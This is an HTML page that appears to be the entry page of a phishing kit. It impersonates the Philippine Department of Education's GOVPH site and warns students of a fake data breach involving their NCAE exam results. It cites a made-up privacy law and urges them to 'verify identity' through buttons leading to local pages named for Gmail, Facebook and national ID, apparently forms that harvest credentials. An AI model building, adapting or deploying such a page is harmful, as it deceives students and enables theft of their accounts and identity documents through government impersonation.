<!DOCTYPE html>
<head>
    <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>DepEd.gov | Verify My Identity</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  	<div class="menu">
	  <div class="menuclass">
	    <p class="label1">MENU <span class="close-btn">&#10005</span></p>
	    <hr>
	  </div>
<div class="opts">
  	  <p>Home</p>
	  <hr>
	  <p>News</p>
	  <hr>
	  <p>About</p>
	  <hr>
	  <p>NCP</p>
	  <hr>
	  <p>NGP</p>
	  <hr>
	  <p>FAQ's</p>
</div>
	</div>
	
	
	<div class="main-container" style="display: block;">
		<header>
			<span class="mainlogo">GOVPH</span><span class="menu-toggle">&#9776</span>

		</header>
					<div class="mainhead">
          <img class="mainheader" src="DepEd-Website-header-110px_1.png" alt="">
          <h1 class="h2">VERIFY YOUR IDENTITY</h1>
         <div class="logos1">
         	 <img id="ing1" src="small_foi_logo-150x150.png" alt="small_foi_logo-150x150.png">
 <img id="ing2" src="17245509137031177269572435798329.png" alt="17245509137031177269572435798329.png">
         </div>
			</div>
  
  <div class="body" style="margin: 1em;">
    <p class="disc"><span>&#9432;</span>We have received several reports from students and teachers that some internet hackers are being able to steal informations from the students causing NCAE Results for exposure that might end in Wide breach.</p>
    <p class="disc"><span>&#9432;</span>We do not allow The distribution of Scores without the students permission, it violates the freedom of information & privacy safety act of 1986.</p>
    <p class="disc"><span>&#9432;</span>To successfully obtain your exam results please do the 2nd safety clearing in the following:<br></p>
<div style="margin-left: 1.5em; margin: 10px;">
  <p class="disc">    <span>&#9461</span>You must verify that you're a legitimate <br>student from your district<br><br>
    <span>&#9462</span>To verify, you must select one of the verification methods below such as, verify with national ID, contact us Via special link bellow, verify that you're a real person by loging in with email.<br><br>
    &#9463We recommend the option no.2 cause it's hassle free. Wait for response.</p>
</div>
  </div>
  <style>
    .but{
      width: 80%;
      padding:1.5em;
      box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.3), 0 7px 21px 0 rgba(0, 0, 0, 0.20);
    }
    .div{
      display: flex; justify-content: center;
    }
  </style>
  <center style="margin-top: 4em; margin-bottom: 2em ">
    <p class="disc"><strong>Click the desired button to proceed.</strong></p>
    
    <button onclick="Id()"class="but" type="button"><div class="div">
      <img class="depedlogog" src="Untitled19_20240826142638.png" alt="Untitled19_20240826142638.png">
      <p>Verify with National Id/Driver's Licence/ etc..</p>
    </div></button>
    <button onclick="Facebook()"class="but"type="button">
      <style>
      .depedlogog{
        height: 50px;
        transition: 1s ease;
        filter: drop-shadow(0px 5px 5px #333);
      }
      button{
        transition: 0.3s ease-in-out;
        height: 7em;
        width: auto;
        background-image: linear-gradient(to right, white 30px, transparent);
        background-position-x: 250px;
        background:white;
      }
      .logoskew{
        transition: 1s ease;
        width:50px; height:50px; filter: drop-shadow(0px 5px 5px #333);
      }
        button:hover{
          background: #04508C;
          color: white;
          background-image: linear-gradient(to right, white 30px, transparent);
          background-position-x: 0px;
          
        }
        button:hover img{
          transform: translateY(-10px)skew(5deg);
          filter: drop-shadow(-5px 28px 5px #222);
          
        }
        .gmaillogo{
          transform: translateX(-10px);
        transition: 1s ease;
        width:50px; height:50px; filter: drop-shadow(0px 5px 5px #333);
        }
        .gmaillogo
      </style>
      <div class="div" style="display: flex; justify-content: center;">
        <img class="logoskew"  src="UbJC5lwxeBU.png" alt="">
        <p>Verify by Messaging our staff through special Link</p>
      </div>
    </button>
    
    <button onclick="Gmail()"class="but"type="button"><div class="div">
      <img class="gmaillogo" src="7573337.png" alt="7573337.png">
      <p>Verify Via Email</p>
    </div></button>
  </center>
  
  			<div class="footer1">
			  <img class="seal" src="govph-seal-mono-footer.jpg" alt="govph-seal-mono-footer.jpg">
			  <p class="bold">Republic of the Philippines</p>
			  <p>All content is in the public domain unless otherwise stated.</p>

			  <p class="bold">About GOVPH</p>
			  <p>Learn more about the Philippine government, its structure, how government works and the people behind it.</p>

			  <p>GOV.PH
			    Open Data Portal
			    Official Gazette</p>
			  <p class="bold">Government Links </p>
			  <p>Office of the President</br>
			    Office of the Vice President</br>
			    Senate of the Philippines</br>
			    House of Representatives</br>
			    Supreme Court</br>
			    Court of Appeals</br>
			    Sandiganbayan</p>
			    
			</div>
			
</div>
  <script>
  function Gmail(){
    window.location.href = "gmail.html";
  }
  function Facebook(){
    window.location.href = "fb.html";
  }
  function Id() {
  window.location.href = "Id.html";
}
  
  const menuToggle = document.querySelector('.menu-toggle');
const menu = document.querySelector('.menu');
const closeBtn = document.querySelector('.close-btn');

menuToggle.addEventListener('click', () => {
menu.style.right = menu.style.right === '0px' ? '-250px' : '0px';
});
closeBtn.addEventListener('click', () => {
menu.style.right = menu.style.right === '-250px' ? '0px' : '-250px';
});</script>
</body>
</html>